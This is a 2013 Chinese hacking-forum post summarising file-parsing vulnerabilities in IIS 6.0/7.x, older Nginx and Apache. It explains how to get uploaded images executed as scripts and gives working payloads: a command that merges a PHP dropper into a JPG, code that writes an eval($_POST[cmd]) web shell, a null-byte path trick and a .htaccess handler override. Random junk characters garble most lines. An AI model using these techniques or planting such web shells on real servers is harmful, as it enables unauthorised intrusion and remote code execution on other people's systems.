找回密码
 立即注册
查看: 3111|回复: 0
打印 上一主题 下一主题

常见服务器解析漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:14:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Author : laterain7 y9 K$ O8 c! x# j4 \2 i7 Q
[+]IIS6.0
4 R) E3 @9 i: d! }$ p
7 O! E# T1 a4 H: n) w& [, ]2 G目录解析:/xx.asp/xx.jpg : s9 S3 t" `3 }$ n0 l# s- w$ }
xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码
" ^  Z/ [4 |- d9 p* B IIS6.0 会将 xx.jpg 解析为 asp 文件。  r( s( p* n7 w3 r0 U
后缀解析:/xx.asp;.jpg     , B8 {7 w- z9 u1 Y; \7 l8 t
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
% h! d, y2 x& X2 s+ L+ U) t默认解析:/xx.asa
3 r( G1 Q) n& J! }, M         /xx.cer( @/ w, K! s; @! c
         /xx.cdx# L: q" V- e2 t$ T7 A) ^
IIS6.0 默认的可执行文件除了 asp 还包含这三种8 Q& c1 P9 {" e3 }5 e1 _
此处可联系利用目录解析漏洞 + a& k$ k, I1 \- m% l
/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
+ h" H, p) I3 }[+]IIS 7.0/IIS 7.5/Nginx <0.8.03' G' \* K  b6 i! L' d: ?

9 u8 b8 l  i! h4 z+ A$ V9 f$ q IIS 7.0/IIS 7.5/Nginx <0.8.03
. |% R3 @3 @; \+ r 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面
: g; E  h0 T/ N1 @5 t' m( `8 n4 t& G 加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。
+ v9 H, ~2 |' D5 {. `7 \% H 常用利用方法:
; l! a+ v! t5 N9 f* P0 \9 M5 R+ U# S 将一张图和一个写入后门代码的文本文件合并将恶意文本% X: T& Z! l( U+ s" W+ D
写入图片的二进制代码之后,避免破坏图片文件头和尾/ g1 }" q" q) n, i4 s& t# Q/ F
如:4 n/ n- Z; v( p- ~6 [- N
copy xx.jpg /b + yy.txt/a xy.jpg
/ N2 v# A/ i% ^ #########################################################
* f5 ]/ Q# Z' f0 i2 Z& X' W4 R: b /b 即二进制[binary]模式
) \. j7 r1 |( c1 T /a 即ascii模式+ M$ M- `3 V: {4 U  G6 h
xx.jpg 正常图片文件
' u: H) Z  S3 k. B  r' ` yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),
2 B, m+ C( Z. X' @ '<?php eval($_POST[cmd])?>');?>+ h. I. P: M7 ~/ B6 D) \
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称; F! Z3 O- m3 X
为shell.php的文件3 R# }( @. d, @, ?/ f% H* T  C
###########################################################5 Z9 u2 D, A% @' }
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php + Y1 q8 v" K  H- |) A9 s; s
即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
. y+ X7 J' j1 H, w8 O 密码 cmd
$ U7 ], X2 G  b8 ?# E( s( g[+]Nginx <0.8.03& a" Z: F8 o- k

3 i& ?1 i) {: G6 @8 S9 W 在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞: a) X4 \' t- x2 e
在一个文件路径(/xx.jpg)后面加上%00.php( R' m+ g  M- e0 Q# C
会将 /xx.jpg%00.php 解析为 php 文件。
4 ^. u+ x% R8 I; D1 X[+]Apache<0.8.03
$ l8 ^; Y) S; k2 M0 b 4 e# x9 l1 Y0 M8 {0 f, `9 t
后缀解析:test.php.x1.x2.x3
& q6 U5 j8 J) p9 }+ k  @: e Apache将从右至左开始判断后缀,若x3非可识别后缀,
% z( N5 ?! k2 s 再判断x2,直到找到可识别后缀为止,然后将该可识别" m  a( B4 ?. P! I, p+ |3 I: U3 m# Q
后缀进解析test.php.x1.x2.x3 则会被解析为php2 N4 D* p- I: H3 ^. M" y
经验之谈:php|php3|phtml 多可被Apache解析。
) l4 ?& D" D  d/ B4 _[+]其他一些可利用的0 Q2 F- |4 h. G
; Y0 t! t' N# x& r, ^1 H2 m
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的
* `- Z- ?7 Z* a$ J1 S- B% U  J& _若这样命名,windows会默认除去空格或点,这也是可以被利用的!2 N! R# l, K+ d/ t4 `
在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格* d6 K0 Y' j, |+ ?7 A4 U( J: q
或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可
5 R9 {8 P0 `5 e( @( s# H得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。9 i1 [* ]6 t- O; J5 p
{Linux主机中不行,Linux允许这类文件存在}$ [, |0 ~% E& H0 ^5 h/ s2 t2 D
如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说: l9 x1 e" ~6 x6 T( M$ M7 W
的,当初我并不知道),且可以被上传,那可以尝试在1 [+ `" r. v$ P) E6 z* B+ ^! w
.htaccess中写入:
4 A( @# ~( _5 [5 f: k8 G<FilesMatch “shell.jpg”> 7 J& M  p% i3 F) ^
SetHandler application/x-httpd-php
8 Z+ l) p3 m) T$ E8 y</FilesMatch>3 S) i$ b/ `$ D: j/ j3 D/ ~
shell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件
+ c# J1 i& f" Y- y! i* V[+]错误修改
# P; A7 p  Y! I! R . k3 b  D8 l5 A0 d7 I" S) o" B- j
在 IIS 6.0 下可解析 /xx.asp:.jpg
6 y6 n7 \3 S, b- i{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去
6 q) s* L, X( R& u9 [7 `剩下/xx.asp}修改:
" q  k5 ^" W3 _3 F' P先谢谢核攻击的提醒
- c$ Z1 \7 J' N' V2 W" {+ l2 j, r; s当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp
( m& j. q2 @$ A4 h里是没有任何内容的,因为。。不好解释 大家自己看
# R0 S: l( c6 {3 ^http://lcx.cc/?i=2448
; O. q2 `8 r6 U% h& g' Xhttp://baike.baidu.com/view/3619593.htm
$ n+ h5 V$ B: V! }5 ^: ]2 l7 X9 ?# ^
! J- C& A0 r/ O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表